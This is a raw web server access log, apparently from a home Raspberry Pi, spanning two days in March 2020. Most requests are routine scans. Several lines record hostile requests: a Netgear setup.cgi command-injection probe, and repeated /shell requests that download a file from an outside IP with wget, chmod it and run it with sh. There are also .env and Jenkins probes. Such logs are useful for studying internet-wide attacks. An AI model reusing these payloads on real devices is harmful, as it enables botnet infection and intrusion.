Sat Mar 21 06:25:07 MDT 2020 06:25:07 up 25 days, 10:53, 1 user, load average: 0.37, 0.27, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 25days 22:27 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 171.67.70.85 - - [21/Mar/2020:13:54:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 195.187.156.48 - - [21/Mar/2020:13:59:14 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 59.102.132.187 - - [21/Mar/2020:14:23:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 59.102.132.187 - - [21/Mar/2020:14:23:38 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0" 59.102.132.187 - - [21/Mar/2020:14:23:42 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.53.110.152 - - [21/Mar/2020:14:53:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 92.6.157.64 - - [21/Mar/2020:15:54:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 189.1.9.134 - - [21/Mar/2020:18:33:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 117.196.229.95 - - [21/Mar/2020:18:37:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 171.67.70.85 - - [21/Mar/2020:19:54:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 162.243.134.25 - - [21/Mar/2020:20:04:23 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 220.144.138.107 - - [21/Mar/2020:20:17:39 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 220.144.138.107 - - [21/Mar/2020:20:17:40 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 35.205.86.202 - - [21/Mar/2020:20:20:26 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 220.134.79.85 - - [21/Mar/2020:20:34:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 103.200.30.97 - - [21/Mar/2020:22:22:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 138.255.222.162 - - [21/Mar/2020:23:01:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 80.82.65.234 - - [22/Mar/2020:00:55:27 +0000] "UNKNOWN HTTP" 400 0 "" "" 76.167.233.54 - - [22/Mar/2020:01:09:38 +0000] "GET / HTTP/1.1" 400 0 "" "" 190.122.147.154 - - [22/Mar/2020:01:46:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 171.67.70.85 - - [22/Mar/2020:01:55:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 18.217.112.17 - - [22/Mar/2020:02:34:26 +0000] "GET /.env HTTP/1.1" 404 0 "" "curl/7.58.0" 18.217.112.17 - - [22/Mar/2020:02:55:28 +0000] "GET / HTTP/1.1" 200 25000 "" "curl/7.58.0" 187.39.87.52 - - [22/Mar/2020:04:36:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 61.219.11.153 - - [22/Mar/2020:05:21:45 +0000] "GET / HTTP/1.1" 400 0 "" "" 2.38.185.198 - - [22/Mar/2020:06:51:17 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 202.162.201.61 - - [22/Mar/2020:07:51:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 139.162.119.197 - - [22/Mar/2020:07:52:18 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 171.67.70.85 - - [22/Mar/2020:07:57:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 222.186.19.221 - - [22/Mar/2020:08:21:28 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 78.187.240.74 - - [22/Mar/2020:08:48:01 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0" 78.187.240.74 - - [22/Mar/2020:08:48:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.58.56.175 - - [22/Mar/2020:11:11:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 220.144.138.107 - - [22/Mar/2020:11:22:18 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 183.81.157.18 - - [22/Mar/2020:11:51:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Sun Mar 22 06:25:05 MDT 2020 06:25:05 up 26 days, 10:53, 1 user, load average: 0.37, 0.27, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 26days 23:02 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE